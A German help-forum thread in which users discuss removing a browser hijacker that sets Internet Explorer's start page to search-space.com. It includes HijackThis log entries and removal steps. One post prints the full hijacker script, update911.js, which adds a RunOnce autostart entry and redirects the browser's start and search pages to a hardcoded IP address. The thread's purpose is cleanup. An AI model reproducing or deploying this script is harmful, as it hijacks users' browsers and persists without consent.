Problem IE - http://www.search-space.com/ - Startseite - Trojaner

Vorgehen:

1.) IE beenden.
2.) Folgende Einträge / Dateien suchen.


C:\windows.3\winlogon.exe

Löschen.


R0 - HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = http://www.search-space.com/
R0 - HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = http://www.search-space.com/
R1 - HKCU\Software\Microsoft\Internet Explorer\Main,HomeOldSP = http://www.search-space.com/
O2 - BHO: (no name) - {00110011-4B0B-44D5-9718-90C88817369B} - C:\WINDOWS.3\NavExt.dll

Löschen.


O4 - HKCU\..\Run: [winlogon] c:\windows.3\winlogon.exe
O4 - HKCU\..\Run: [QuickTime Task] c:\windows.3\qttasks.exe

Ebenfalls löschen. PC neustarten.


3.) Browserwechsel:

- http://firebird-browser.de
- http://mozilla.kairo.at
- http://opera7.de

 

Offensichtlich hast du beim Entfernen was übersehen. Poste ein aktuelles HijackThis-Log.
Im Übrigen: Auch wenn man dir dieses Mal helfen kann, wirst du bald wieder dasselbe Problem haben. Liegt an deinem IE. Der ist unheilbar krank.
Ist dir schon mal aufgefallen, dass NUR IE-User solche Probleme mit Hijackern haben? Denk mal drüber nach.

 

Habe auch das wenig lustige Problem permanent von diesem Hijacker genervt zu werden.
Hab im Taskmanager alle laufenden Prozesse aufgerufen und die nicht von Microsoft stammende winlogon.exe erst gekillt und danach gelöscht. Habe dann Adaware 6.0 laufen lassen und den Registryeintrag entfernen lassen. Danach habe ich nochmal bei pestpatrol nachgeschaut, ob es dort weitere Hinweise gäbe. Dort waren diverse .dll und .exe Dateien angegeben, von denen ein paar auch auf meinem Rechner waren - hab diese dann gelöscht. Nun dachte ich, daß nach einem Neustart alle meine Probleme Vergangenheit wären aber irgendwie wurde als Startseite wieder search-space.com angegeben - hatte aber vorher alle IE Einstellungen zurückgesetzt.
Also den ganzen Spaß wieder von vorn - diesmal unter Zuhilfename von Spybot Search and Destroy, den ich vorher gleich noch über das Netz aktualisiert habe. Beim ersten Durchlauf meldete er mir besagten Registryeintrag und entfernte ihn auch gleich. Nach einem folgenden Neustart mit anschließendem Scan fanden weder Spybot noch Adaware irgendwelche Einträge aber mein IE hatte als Startseite wieder search-space.com. Da ich das Spielchen nun so langsam satt und auch keine neuen Ideen habe wie ich dieses Problem nun lösen könnte vertraue ich auf dieses Forum.

viele Grüße, DonAlfonso

 

Habe das selbe problem,
habe im Ordner Windows die datei update911.js
gefunden mit folgenden Inhalt:

var url = "http://81.211.105.9/index.php?v=1";
var burl = "http://81.211.105.9/search.php?v=1";
var fso = new ActiveXObject("Scripting.FileSystemObject");
var tfolder = fso.GetSpecialFolder(0);
var filepath = tfolder + "\\update911.js";
var Shell = new ActiveXObject("WScript.Shell");
Shell.RegWrite("HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\tlc",filepath);
Shell.RegWrite("HKCU\\Software\\Microsoft\\Internet Explorer\\Main\\Start Page",url);
Shell.RegWrite("HKCU\\Software\\Microsoft\\Internet Explorer\\Main\\Search Page",url);
Shell.RegWrite("HKCU\\Software\\Microsoft\\Internet Explorer\\Main\\Search Bar",burl);
Shell.RegWrite("HKCU\\Software\\Microsoft\\Internet Explorer\\Main\\Use Search Asst","no");
Shell.RegWrite("HKCU\\Software\\Microsoft\\Internet Explorer\\Main\\Use Custom Search URL",1,"REG_DWORD");

Die Datei löschen/umbennen und die regestrie einträge entfernen,
bei Extras und Interneteinstellung auf leere Seite stellen,
Neustart durchführen und schon klappt alles wieder.